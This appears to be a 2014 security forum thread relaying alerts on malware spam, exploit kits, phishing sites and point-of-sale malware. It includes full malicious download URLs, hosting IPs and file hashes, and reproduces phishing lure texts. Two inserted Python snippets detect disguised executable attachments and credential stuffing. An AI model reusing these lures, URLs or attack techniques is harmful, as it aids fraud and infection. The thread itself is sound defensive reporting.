Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustotal.com/en-gb/file/b1b121a0ef68b7abf628b4bdf10d583e6996c35a1888779e78d75c2907aebdf7/analysis/1409133512/
___

Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most commonly used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the time only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
Java .com
Deviantart .com
TMZ .com
Photobucket .com
IBTimes .com
eBay .ie
Kapaza .be
TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IPs having been associated with these domains:
198.27.88.157: https://www.virustotal.com/en/ip-address/198.27.88.157/information/
94.23.252.38: https://www.virustotal.com/en/ip-address/94.23.252.38/information/
178.32.21.248: https://www.virustotal.com/en/ip-address/178.32.21.248/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___

"Customer Statements" - malware SPAM
- http://blog.dynamoo.com/2014/08/customer-statements-malware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
From: Accounts [hiqfrancistown910@ gmail .com]
Date: 27 August 2014 09:51
Subject: Customer Statements
Good morning,attached is your statement.
My regards.
W ELIAS

Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustotal.com/en-gb/file/d4701c59264760f0d9a4e47cb9d7db9cb76445bf4f042c1d845ab5191f1cd689/analysis/1409135030/
___

Royal Bank of Canada Payment Spam
- http://threattrack.tumblr.com/post/95908793833/royal-bank-of-canada-payment-spam
Aug 27, 2014 - "Subjects Seen:
The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
The transfer is now complete.
Message recipient: The rating was not provided.
See details in the attached report.
Thank you for using the Service INTERAC Bank RBC Royal Bank.

Malicious File Name and MD5:
INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb4a2ec18d4a89785009fc1879506a92/tumblr_inline_nayu2cOUqn1r6pupn.png

Tagged: RBC, Upatre
___

AT&T DocuSign Spam
- http://threattrack.tumblr.com/post/95918175803/at-t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
Hello,
AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.

Malicious URLs:
79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2be088fa857d593c69b6a9644b1fec46/tumblr_inline_naz25ifIWp1r6pupn.png

79.172.51.73: https://www.virustotal.com/en-gb/ip-address/79.172.51.73/information/

Tagged: ATT, DocuSigin, Upatre

- http://myonlinesecurity.co.uk/please-docusign-document-contract_changes_08_27_2014-pdf-fake-pdf-malware/
27 Aug 2014
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/95917541998/adp-past-due-invoice-spam
Aug 27, 2014 - "Subjects Seen:
ADP Past Due Invoice
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here...

Malicious URLs:
81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/595fe50ab5e77ca2c29866eed0475ea8/tumblr_inline_naz1pmSD3h1r6pupn.png

81.80.82.27: https://www.virustotal.com/en-gb/ip-address/81.80.82.27/information/

Tagged: ADP, Upatre
___

Fake Payment Advice SPAM - PDF malware
- http://myonlinesecurity.co.uk/payment-advice-note-27-08-2014-fake-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Disclaimer:
This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
Cell 270 547-9194

27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)
Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55*. This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2423cecc3c6a33db524d3d067103f9685576c8d1317d7d279917de986057f9ba/analysis/1409154303/

:fear: :mad:

AplusWebMaster
2014-08-29, 03:09
FYI...

The ‘Unknown’ Exploit Kit ...
- https://blog.malwarebytes.org/exploits-2/2014/08/shining-some-light-on-the-unknown-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_only.png
Flash only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Flash_only.png
Silverlight and Flash:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)

:fear::fear:

AplusWebMaster
2014-08-29, 13:39
FYI...

Fake 'new photo' SPAM - malware
- http://myonlinesecurity.co.uk/new-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:

my new photo ..
if you like my photo to send me u photo

29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/e4c328815cc2840b53514e7bdcc43c83b29c0ae4676c755b4ee9587aa8c37db9/analysis/1409297373/
___

Netflix PHISH ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-netflix-site-wants-to-leave-you-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/phish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."

176.74.28.254: https://www.virustotal.com/en/ip-address/176.74.28.254/information/

netflix-ssl .net / 92.222.121.100: https://www.virustotal.com/en/ip-address/92.222.121.100/information/
8.31.2014 9:02AM EDT
___

Internet Disconnection SCAM calls
- http://www.hoax-slayer.com/telstra-tech-support-scam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___

Fake Refund email targets UK taxpayers
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-refund-mail-targets-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for an HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HMRC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov.uk/security/reporting.htm
___

New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The -install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the -uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks.
IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-system-breaches.pdf
___

Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquirer.net/inquirer/news/2362576/microsoft-boots-1-500-apps-from-its-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows.com/buildingapps/2014/08/27/how-were-addressing-misleading-apps-in-windows-store/

:fear: :mad:

AplusWebMaster
2014-09-01, 13:00
FYI...

Tesco Phish ...
- http://myonlinesecurity.co.uk/tesco-payback-rewards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
Tesco Customer Satisfaction program selected you to take part in our quick survey.
To earn your 150 £ reward, please click here and complete the form.

Screenshots:
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards1.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards2.png

All of these emails use social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___

Fake Statement SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-01092014-fake-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, as far as we can determine they have not been hacked or their website or email system compromised... Email reads:

Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.

1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55*. This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dd96f70183fd6f9482243e04b02a75c66040bafa64f612aebc99b4302709f1d7/analysis/1409570924/
___

O/S Market Share - August 2014 ...
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
9/1/2014
___

China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.com/article/2014/09/01/us-china-antitrust-microsoft-idUSKBN0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. 
Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."

:mad: :fear:
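The "spoofed icon" attachments in the posts above (Payment_Advice_Note_27.08.2014.PDF.scr, D0110109.PDF.exe, photo.exe) all rely on Windows hiding the final extension. Added example, not code from any of the quoted blogs: a mail-gateway style check that flags a double extension ending in an executable type, a bare executable, or an archive named as a document, and also looks inside a zip. The sample archive is constructed in memory with a text placeholder under an executable name.

```python
"""Flag attachments that hide an executable behind a document-looking name.

Added example (not the quoted blogs' code). File names are those reported
in the posts above; the zip archive is constructed here for the demo.
"""
import io
import zipfile
from typing import List, Optional

# Extensions Windows runs (or treats as a script/screensaver) on double-click.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta"}
# Extensions a recipient expects to be harmless documents or images.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
                 "txt", "rtf"}
ARCHIVE_EXTS = {"zip", "rar", "7z"}


def classify_name(filename: str) -> Optional[str]:
    """Return a reason if the name looks like a disguised executable, else None.

    1. final extension is executable and an earlier part is a document
       extension ('Statement.PDF.exe' shows as 'Statement.PDF' when
       known extensions are hidden);
    2. final extension is executable at all ('photo.exe');
    3. archive whose name claims to be a document ('Payment.PDF.zip').
    """
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return None
    final = parts[-1]
    inner = set(parts[1:-1])          # every extension-like part except the last
    if final in EXECUTABLE_EXTS:
        doc_like = sorted(inner & DOCUMENT_EXTS)
        if doc_like:
            return f"executable '.{final}' hidden behind '.{doc_like[0]}'"
        return f"executable attachment '.{final}'"
    if final in ARCHIVE_EXTS and inner & DOCUMENT_EXTS:
        return f"archive '.{final}' named as a document"
    return None


def scan_zip(data: bytes) -> List[str]:
    """Classify every member name of a zip given as bytes; return the findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            base = member.rsplit("/", 1)[-1]      # ignore any folder prefix
            reason = classify_name(base)
            if reason:
                findings.append(f"{member}: {reason}")
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive shaped like the 'Payment Advice Note' one;
    the members are text placeholders, not real binaries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Payment_Advice_Note_27.08.2014.PDF.scr", "placeholder")
        zf.writestr("readme.txt", "benign member")
    return buf.getvalue()


if __name__ == "__main__":
    for name in ["D0110109.PDF.exe", "photo.exe", "00056468.pdf.zip", "invoice.pdf"]:
        print(f"{name}: {classify_name(name) or 'ok'}")
    for finding in scan_zip(build_sample_zip()):
        print("in archive ->", finding)
```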

AplusWebMaster
2014-09-02, 14:01
FYI...

Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo.com/2014/09/something-evil-on-95163121188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimate ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-traffic-analysis.net/2014/08/29/index.html

** http://blog.dynamoo.com/search/label/DINETHOSTING

> https://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack
"... automated iframe obfuscating services for use in web injections. The iframes are -injected- into high-traffic-volume websites and force the users of the websites to visit end points that serve exploits carrying malware..."
___

Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecurity.co.uk/automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:

Attempting to contact <REDACTED>
This is automated draw #23851
Our system shows you have been awarded with £1000!
According to our records, voucher wasn’t collected yet
Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
Confirm your email here to claim your £1000 voucher.
Have fun !
Lindsey Lane
CRM Manager..
* This offer is available to new players only.
You have received this email because you have requested more information from BonusNews...

Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustotal.com/en/file/a615d125ab7423f6c89e5074ed42e568a898f3beab6c3c3c174f417c54529f89/analysis/
___

Hackers behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.org/story/14/09/01/2213202/hackers-behind-biggest-ever-password-theft-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.namecheap.com/blog/2014/09/01/urgent-security-warning-may-affect-internet-users/

:mad: :fear:
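The Namecheap incident above is a credential-stuffing run: one source walking a stolen username/password list, mostly failing, occasionally succeeding. Added example, not Namecheap's own detection logic: a check over constructed login-log lines (made-up format: time, source IP, username, result, user-agent) that flags a source trying many distinct usernames in a short window with a low success rate, and lists the accounts that did succeed from it.

```python
"""Detect a credential-stuffing burst in web-login logs.

Added example; the log format and all lines below are constructed
(RFC 5737 documentation addresses), not real Namecheap data.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
2014-09-01T22:10:01 203.0.113.7 alice LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:02 203.0.113.7 bob LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:02 203.0.113.7 carol LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:03 203.0.113.7 dave LOGIN_OK Mozilla/5.0
2014-09-01T22:10:03 203.0.113.7 erin LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:04 203.0.113.7 frank LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:04 203.0.113.7 grace LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:05 203.0.113.7 heidi LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:05 203.0.113.7 ivan LOGIN_FAIL Mozilla/5.0
2014-09-01T22:10:06 203.0.113.7 judy LOGIN_FAIL Mozilla/5.0
2014-09-01T22:11:00 198.51.100.20 alice LOGIN_FAIL Mozilla/5.0
2014-09-01T22:11:30 198.51.100.20 alice LOGIN_OK Mozilla/5.0
"""


def parse(log: str) -> List[Tuple[datetime, str, str, bool]]:
    """Split each line into (timestamp, source ip, username, succeeded)."""
    events = []
    for line in log.splitlines():
        ts, ip, user, result, _ua = line.split(" ", 4)
        events.append((datetime.fromisoformat(ts), ip, user, result == "LOGIN_OK"))
    return events


def detect_stuffing(log: str, window_seconds: int = 300, min_users: int = 5,
                    max_success_ratio: float = 0.2) -> Dict[str, dict]:
    """Flag sources that, within one time window, try at least `min_users`
    distinct accounts with a success ratio at or below `max_success_ratio`.

    A normal user who forgets a password retries ONE account; a list replay
    touches many accounts and mostly fails.  Successful logins from a flagged
    source are reported as likely compromised accounts.
    """
    events = parse(log)
    if not events:
        return {}
    t0 = min(ts for ts, _, _, _ in events)
    # Group attempts by (source, fixed-size window counted from the first event).
    buckets: Dict[Tuple[str, int], List[Tuple[str, bool]]] = defaultdict(list)
    for ts, ip, user, ok in events:
        bucket = int((ts - t0).total_seconds()) // window_seconds
        buckets[(ip, bucket)].append((user, ok))

    findings: Dict[str, dict] = {}
    for (ip, _bucket), attempts in buckets.items():
        users = {u for u, _ in attempts}
        successes = sorted(u for u, ok in attempts if ok)
        ratio = len(successes) / len(attempts)
        if len(users) >= min_users and ratio <= max_success_ratio:
            findings[ip] = {"attempts": len(attempts),
                            "distinct_users": len(users),
                            "compromised": successes}
    return findings


if __name__ == "__main__":
    for ip, info in detect_stuffing(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} attempts over {info['distinct_users']} "
              f"accounts; succeeded on {info['compromised']}")
```

The flagged source's successful logins are the accounts to force a password reset on; the single-account retry from the second source is deliberately not flagged.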

AplusWebMaster
2014-09-03, 13:44
FYI...

Fake NDR SPAM - PDF malware
- http://myonlinesecurity.co.uk/ndr-bill-fake-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details.
- If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...

3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5d7a2618d95f21ab31cdea298dcb9b57739c0432acaad2167d2651538517c808/analysis/1409725854/

- http://blog.dynamoo.com/2014/09/fake-westlothiangovuk-ndr-bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
From: Ebilling [Ebilling@ westlothian .gov.uk]
Date: 3 September 2014 09:20
Subject: NDR Bill
Please find attached your Non Domestic Rates bill...

